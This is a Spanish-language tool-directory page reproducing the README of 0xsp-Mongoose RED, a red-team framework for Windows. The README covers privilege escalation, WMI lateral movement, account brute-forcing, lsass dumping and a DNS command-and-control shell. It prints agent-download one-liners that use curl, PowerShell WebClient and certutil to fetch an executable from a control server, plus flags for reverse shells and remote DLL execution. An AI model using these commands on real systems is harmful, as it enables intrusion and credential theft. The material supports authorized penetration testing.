Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
0xsp-Mongoose — un framework único para simulación de ciberseguridad y operaciones de red team, auditoría de Windows para vulnerabilidades más recientes, configuraciones incorrectas y ataques de escalada de privilegios, replicar las tácticas y técnicas de un adversario avanzado en una red. | Kitploit
Herramientas/GitHubGitHub/zux0x3a/0xsp-mongoose
Escalada de PrivilegiosEscáneres de VulnerabilidadesMapeo de RedesAtaques de ContraseñasExplotaciónMovimiento LateralExplotación de Aplicaciones WebPost-ExplotaciónComando y ControlRed TeamingAnálisis de DNSArchived
5341174hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

un framework único para simulación de ciberseguridad y operaciones de red team, auditoría de Windows para vulnerabilidades más recientes, configuraciones incorrectas y ataques de escalada de privilegios, replicar las tácticas y técnicas de un adversario avanzado en una red.

Ver RepositorioSitio web

GPLv3 license

Apoya el proyecto para el desarrollo continuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED para Windows

Versión actual 2.2.0

La versión roja de 0xsp mongoose se proporciona para ayudar a sus necesidades durante la simulación de ciberseguridad; al usar esta versión, podrá auditar un sistema operativo Windows objetivo en busca de vulnerabilidades del sistema, configuraciones incorrectas y ataques de escalada de privilegios, y replicar las tácticas y técnicas de un adversario avanzado en una red.

Con el soporte de NodeJS para la API de aplicaciones web, la instalación y personalización se vuelve mucho más fácil y oportuna. El agente sensor de Windows se comunicará con la API de la aplicación para transferir resultados y recibir comandos como técnica bidireccional.

El agente es capaz de identificar y detectar exploits de Windows mediante el uso de los módulos windows update api y exploit database definitions. La nueva versión también detectará las siguientes vulnerabilidades.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Características

  • Técnicas de escaneo de escalada de privilegios en Windows.
  • Aplicación web construida con NodeJS
  • Soporta base de datos SQLite
  • Técnicas de movimientos laterales. video
  • Canal de comunicación bidireccional. video
  • Empaquetado en línea de plugins.
  • Motor de scripting mejorado para detección de exploits.
  • Módulo de fuerza bruta de cuentas de Windows (Local / Dominio)
  • Armamentización de la función run-as-user de la API de Windows. Video
  • Escaneo de red local y enumeración de recursos compartidos.
  • Técnica de volcado de memoria lsass (plugin).
  • Modo shell interactivo DNS C2C

instalación

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

Credenciales de acceso predeterminadas:

  • usuario : admin
  • contraseña : 0xsp

Script Python para DNS C2C

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Despliegue rápido del agente

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Uso

root@kitploit:~
-s --recuperar servicios de Windows y controladores instalados.
-u --recuperar información sobre usuarios, grupos, roles.
-c --buscar controladores conectados para archivos de configuración sensibles por extensión.
-n --recuperar información de red, interfaces de red, detalles de conexión.
-w --enumerar directorios escribibles, verificar permisos de acceso, permisos modificados.
-i --enumerar información del sistema de Windows, sesiones, verificación de elevación siempre activa.
-l --buscar en cualquier archivo una cadena específica, ej: agent.exe -l c:\ password *.config.
-o --especificar dirección host de la aplicación NodeJS, también se puede usar srvhost.
-p --enumerar software instalado, procesos en ejecución, tareas.
-e --herramienta de inspección del kernel, ayudará a buscar en bases de datos de herramientas vulnerabilidades del kernel de Windows.
-x --contraseña para autorizar su conexión con la aplicación NodeJS.
-d --descargar archivos directamente en la máquina objetivo.
-t --subir archivos desde la máquina objetivo a la aplicación NodeJS.
-spooler --escanear un solo host o una lista de hosts para posible CVE-2021-1675 (ej: -spooler -srvhost o -spooler -hosts)
-m --ejecutar todos los tipos de escaneo conocidos juntos.

[!] SECCIÓN DE TÁCTICAS DE RED TEAM

-r --generar una shell inversa con una cuenta específica.
-lr --técnica de movimiento lateral usando WMI (ej: -lr -host 192.168.14.1 -username administrador -password blabla -srvhost ipnodejs)
-nds --descubrimiento de red y enumeración de recursos compartidos
-dns --establecer shell interactivo DNS C2C
-cmd --transferir comandos a través de shell HTTP
-interactive --iniciar modo interactivo (ej: cargando plugins...)
-username --autenticación de identidad para módulos de ataque específicos.
-password --autenticación de identidad para módulos de ataque específicos.
-host --identificar host remoto para realizar un ataque.
-srvhost --establecer el host remoto de la aplicación NodeJS.
-bf --módulo de fuerza bruta para usuarios locales / usuarios de dominio.
-import --importar y ejecutar un archivo DLL localmente.
-remote --importar y ejecutar un archivo DLL desde un host remoto.

Documentación

https://0xsp.com/security%20dev/0xsp-mongoose-red

Sitio de investigación detallada

https://0xsp.com

Conferencias de seguridad

  • Standoff365 - Rusia (https://standoff365.com/conferences/357)

Tutoriales de la herramienta

Asegúrate de suscribirte al siguiente canal para recibir notificaciones cuando se publiquen nuevos tutoriales y trucos para 0xsp.

https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Descargar herramienta